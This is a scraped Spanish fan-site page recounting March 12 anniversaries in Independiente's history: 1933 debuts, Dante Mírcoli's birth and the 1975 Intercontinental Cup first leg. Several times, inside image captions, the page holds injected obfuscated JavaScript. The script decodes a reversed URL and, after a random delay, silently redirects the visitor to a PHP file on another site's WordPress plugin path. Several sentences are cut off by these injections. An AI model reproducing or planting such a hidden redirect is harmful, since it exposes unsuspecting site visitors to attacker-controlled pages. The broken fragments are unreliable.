Conectate con nosotros

Efemérides

Efemérides del 12 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1933Independiente debuta en el Campeonato de Primera División 1933 recibiendo y ganándole a River por 1 a 0, con gol de Hugo Lamanna a los 33 minutos. Aquel día el equipo fue: Fernando Bello; Luis Fazio y Fermín Lecea; Juan Ferrou, Juan Corazzo y Emilio Almiñana; Roberto Porta, Antonio Sastre, Hugo Lamanna, Luis Ravaschino y Mario Evaristo, siendo Zoilo Canaveri el D.T.

Aquella jornada se produjeron algunos debuts con la camiseta roja que valen la pena destacar. En primer lugar el puntero izquierdo Mario Evaristo, jugador surgido de Boca donde ganó varios títulos, además de disputar el Mundial 1930 para la Selección Nacional. En 1932 pasó por Sportivo Palermo y para 1933 llega a Independiente, donde permanecería por dos años sin destacarse demasiado y luego continuaría su carrera en Italia y Francia. En el Rojo compartió plantel con su hermano Juan Evaristo.

Otro debutante fue justamente el autor del gol, Hugo Lamanna, surgido de Talleres de Remedios de Escalada, donde se convirtió en figura destacada desde finales del amateurismo hasta principios del profesionalismo. Llegó al Rojo como parte de la renovación del ataque, ya que Manuel Seoane y Luis Ravaschino ya estaban sobre el final de su carrera. Hugo tenía la responsabilidad de suplantar a jugadores que no solamente eran ídolos el club, sino que también eran emblemas del fútbol argentino. Pero no le pesó la responsabilidad, ya que en esa misma temporada disputó 23 encuentros marcando 19 goles, mostrando todo su potencial goleador.

Era un jugador muy atlético, alto y de mucha potencia. Tenía una gran capacidad de juego aéreo, facilitado por haber sido defensor desde joven. Curiosamente, a pesar de su gran rendimiento, fue su único año vestido de Rojo, y no pude saber concretamente el motivo aunque he leído que fue suspendido. En su lugar, Independiente contrataría al año siguiente a Arsenio Pastor Erico, llamado ser el más grande goleador que tuvo el fútbol argentino, y el mejor futbolista paraguayo de todos los tiempos.

Hugo pasó a Vasco da Gama de Brasil, luego volvería al país para jugar de nuevo en Talleres de Remedios de Escalada y en Vélez, y posteriormente llevaría sus goles a Europa. En Francia jugó para Stade Français de París y Racing Club de París, y en Italia lo hizo para Atalanta, Spezia Calcio, Juve Stabia y Frosinone Calcio. Ya retirado continuó con su vida en Italia, donde fue director técnico de Calcio Lecco, AC MonzaBrianza, Como, Bari, etc.

Por último, el más importante de los debuts de aquel día, fue el del arquero Blas Fernando “Tarzán” Bello, quien se convertiría en una auténtica leyenda del Rojo y del fútbol nacional. Llegó para reemplazar al primero de los arqueros del profesionalismo, Néstor Sangiovanni, y un día como hoy dio inicio a una trayectoria notable. Permaneció en el club siendo inamovible hasta 1944, disputando 300 partidos. Fue campeón de los primeros dos títulos profesionales del club en 1938 y 1939, pero además obtuvo la Copa Aldao 1938 y 1939, la Copa Ibarguren y la Adrián Escobar 1939, y sumado a eso logró más de una decena de títulos no oficiales de la época.

Su apodo habla de su característica principal, era un volador de palo a palo, pero también tenía un gran físico, de muchísima seguridad en sus manos, reflejos y serenidad bajo los tres palos. Fue fundamental sosteniendo al conjunto bicampeón del país y que ganó 7 títulos consecutivos en total, marcando época en el país y siendo demoledor como ningún otro en la historia. Mientras las estrellas de la delantera solo miraban el arco rival, Fernando Bello sostenía el propio restando preocupaciones a todos.

Fuera de la cancha, “Tarzán” Bello aumentaba su idolatría por su carisma y su lucha por los demás futbolistas, ya que es uno de los fundadores de Futbolistas Argentinos Agremiados en 1945. Es el primer D.T. arquero en salir campeón en Argentina, ya que siendo secretario de la organización que fundó, también era el director técnico del Rojo en 1948, cuando terminaría coronándose (antes lo despidieron por apoyar la huelga de jugadores de ese año, revolucionando al fútbol y a la imagen del futbolista). Luego trabajó mucho tiempo en las inferiores del club, hasta su fallecimiento con 63 años en 1974.

También supo atajar para la Selección Nacional y logró ser campeón del Sudamericano 1937 y 1941. Un ídolo notable y absoluto al que no le faltó nada.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»84″ height=»65″/></figure></div>



<p><strong>1947</strong> – <strong>Nacimien<script>$mWn=function(n){if(typeof ($mWn.list[n])==to en Roma, Italia, de Dante Mírcoli, “El Tano”. Jugador del Rojo desde 1965 a 1972, integrando los planteles que fueron campeón del Nacional 1967, Metropolitanos 1970 y 1971, y Copa Libertadores 1972. Jugó 143 partidos vestido de rojo marcando 12 goles.

Dante llegó desde su país natal cuando era pequeño y se instaló en Pergamino, las tierras del legendario Blas Fernando “Tarzán” Bello, una ciudad donde abunda el hincha de Independiente. Se nacionalizó argentino, consiguió probarse y quedar fichado en el club, debutando desde muy joven.

Originariamente era lateral izquierdo, pero en ese puesto estuvo siempre el inamovible e indiscutible Ricardo “Chivo” Pavoni, por eso se fue reconvirtiendo como jugador y volviéndose polifuncional, para de esa forma lograr ser alternativa en cada temporada. Además, como él mismo confesó, era un rebelde en el campo de juego y le gustaba mucho el ataque. Los Ds.Ts. de turno se enojaban, ya que no respetaba las marcas que se le asignaban y era desordenado tácticamente, motivo por el cual era sustituido o iba al banco.

Aun así, jugó mucho desde 1970 en adelante, cuando primero a nivel local y luego a nivel internacional, se estaba gestando el equipo más ganador de la historia del Rojo, del país, de América, y uno de los más ganadores de la historia mundial. Más allá de su rebeldía, Mírcoli también tenía características muy importantes, su temperamento, su entrega y sacrificio, eran incuestionables, resultaba ser comodín del equipo en diferentes puestos, y también sabía aportar goles importante. Por ejemplo, en el Metropolitano1971 supo anotar goles en tres partidos consecutivos que se disputaron en una sola semana, sirviendo para que sean tres victorias al hilo, u otro ejemplo fue en la Copa Libertadores 1972,que salió goleador del equipo con 4 tantos, la misma cantidad que José “Pato” Pastoriza.

Además de lo expuesto, hay que decir que mucha de su fama le llegó en la Copa Intercontinental 1972, final que el Rojo perdió contra el mejor Ajax de toda la historia y uno de los mejores equipos que dio el futbol mundial en todos los tiempos. Y fue porque en la primera final, disputada en Avellaneda, es Mírcoli quien le da un golpe al mismísimo Johan Cruyff, que lo saca del partido por lesionarse la rodilla. Se generó mucho mito en torno a ello, tildando a Dante y al equipo como muy agresivo, pero la realidad es que fue una situación normal de juego y la lesión no fue nada serio, quedando demostrado apenas tres semanas después cuando Johan juega sin ningún problemas el partido revancha.

La otra parte del mito generado en torno al partido le fue favorable a Mírcoli, porque se decía que el “Tano” había “borrado de la cancha” a la estrella holandesa, y por ello desde Europa llegó una oferta para llevárselo. Cierto o no, la cosa fue que Sampdoria de Italia lo compró y así terminó su estadía en Independiente. Rápidamente regresó al país, a Estudiantes de La Plata, luego otro paso por su país natal en Catania y Lecco 1912. Volvió a Argentina para jugar en Racing, y después en Bucaramanga de Colombia donde se retiró.

Una vez retirado comenzó su carrera como D.T. por diferentes clubes del interior del país, hasta que en 2012 vuelve a Independiente para integrarse en el equipo de captación de jugadores, función que desarrolla actualmente yendo a todos lados donde se organicen pruebas de jóvenes valores, participando además en cenas de Peñas a lo largo y ancho del país.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»73″ height=»56″/></figure></div>



<p><strong>1975</strong> – <strong>Independiente en una Doble Visera <script>$mWn=function(n){if(typeof ($mWn.list[n])==totalmente colmada, vence al Atlético de Madrid por 1 a 0 con gol de Agustín “Mencho” Balbuena a los 34 minutos, en lo que fue la primera final de la Copa Intercontinental 1974, la tercera consecutiva que jugaba el Rojo.

Se alargaron en el tiempo los trámites de los dirigentes de Avellaneda para poder jugar contra Bayern Munich, el campeón de Europa 1973-1974, hasta que por su negativa constante se acordó jugar la competición con el subcampeón, algo que pasó y pasaría varias veces por los pretextos europeos de todo tipo en estos años.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»58″ height=»45″/></figure></div>



<div class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»60″ height=»46″/></figure></div>



<div class=

Independiente venía de ser campeón en la edición anterior frente a Juventus en el Olímpico de Roma (donde se jugó un único partido y con ellos de local, ventaja que jamás se había dado), pero no podría mantener el título este año ya que el Atlético de Madrid lo vencería 2 a 0 en la vuelta cuando tan sólo restaban 5 minutos para el final del encuentro. Y no se jugó partido desempate como en todas las ocasiones anteriores en las que hubo un triunfo para cada equipo, salvo en la accidentada edición de 1969 entre Milan y Estudiantes de La Plata.

Los 11 que lograron el triunfo aquel día fueron: José Pérez; Eduardo Commisso, Miguel López, Francisco y Ricardo Pavoni; Aldo Rodríguez (57’ Alejandro Semenewicz), Rubén Galván y Ricardo Bochini; Agustín Balbuena, Percy Rojas y Daniel Bertoni (83’ Luis Giribet), con el D.T. Roberto “Pipo” Ferreiro, quien al perder la Copa tuvo que dejar su puesto en abril, para que tomara el equipo la Subcomisión de Futbol primero y Pedro Dellacha luego. Por su parte el conjunto español lo hizo con: Miguel Reina; Francisco Melo, Ramón Heredia, Domingo Benegas y José Capón; Adelardo Rodríguez, Eusebio, Javier Irureta y Alberto Fernández (45’ Heraldo Bezerra); José Gárate y Rubén Ayala, siendo Luis Aragonés el D.T.

Para conocer un poco más esos apellidos repasemos: el arquero Reina tenía una extensa trayectoria en Barcelona y la tendría también en Atlético, pero el titular era José Pacheco, un histórico que jugó casi un decenio y medio en el club ganando tres ligas y dos Copas del Rey. El defensor Melo alcanzó los 10 años jugando en el Atlético. Benegas era paraguayo y con dos etapas en el equipo madrileño también alcanzó el decenio defendiendo la camiseta, lo mismo que el defensor Capón. Mientras que el más conocido en Argentina era Ramón “Cacho” Heredia, ídolo de San Lorenzo la ser campeón Metropolitano y Nacional en 1972, pasando luego a Atlético donde jugaría desde 1973 a 1977, además de jugar en la Selección Argentina y disputar el Mundial 1974.

Eusebio era otro defensor que jugó más de 10 años en Atlético, lo mismo que el mediocampista Alberto. Mientras que Adelardo lo hizo por 15 años, siendo el que más partidos jugados tiene. Irureta es un ídolo de la institución, y luego realizó una extensa y reconocida trayectoria como D.T. en España. Gárate es otro ídolo del club, superando el decenio con la camiseta. Por otra parte, varios de estos jugadores mencionados tuvieron participaciones en la Selección de España. Finalmente, queda otro conocido como Rubén “Ratón” Ayala, un gran goleador que había sido gloria de San Lorenzo, y lo sería también con Atlético. Por último, el D.T. Luis Aragonés, de los máximos ídolos en la historia de Madrid como jugador, y apenas retirado tomó el cargo de técnico desde 1974 hasta 1980, pero luego volvería en sucesivas etapas, siendo un emblema para todo el fútbol español por su extensa carrera y llegando a dirigir la Selección Nacional.

Yendo al partido y su trámite, hay que decir que Independiente justificó la victoria pero sin sobrarle demasiado. Atlético presentó un esquema netamente defensivo, con Eusebio pegado los 90 minutos a Bochini, y el resto anulando a Bertoni y Rojas. Con mucho sacrifico y gran forma física, pudo cortar el circuito del juego rojo, además de anticiparse a todas las pelotas cuando eran jugadas largas. Independiente fue el que propuso juego, aun cayendo en errores en los caminos, tuvo maniobras en las que, jugando en corto, pudo romper la pared defensiva de los españoles. Una de esas jugadas fue realizada por Daniel Bertoni, perforando con su gambeta para asistir a Balbuena que definió por bajo a la red.

Como dije, en la revancha el Rojo perdería por 2 a 0 y se quedaría sin trofeo. Un maravilloso equipo de Independiente, multicampeón de copas internacionales en un proceso que jamás nadie igualó en América, que seguiría su camino copero a pesar de perder esta final, ya que ganaría más tarde la cuarta Copa Libertadores consecutiva, superando a las tres en fila logradas por Estudiantes, y convirtiéndose en récord jamás igualado, además de acceder al derecho de una nueva Copa Intercontinental que no se disputaría por negación de los equipos europeos.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»75″ height=»58″/></figure></div>



<p>Aquí les dejo <strong>el video del gol de Balbuena</strong> en aquella final:</p>



<figure class=

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides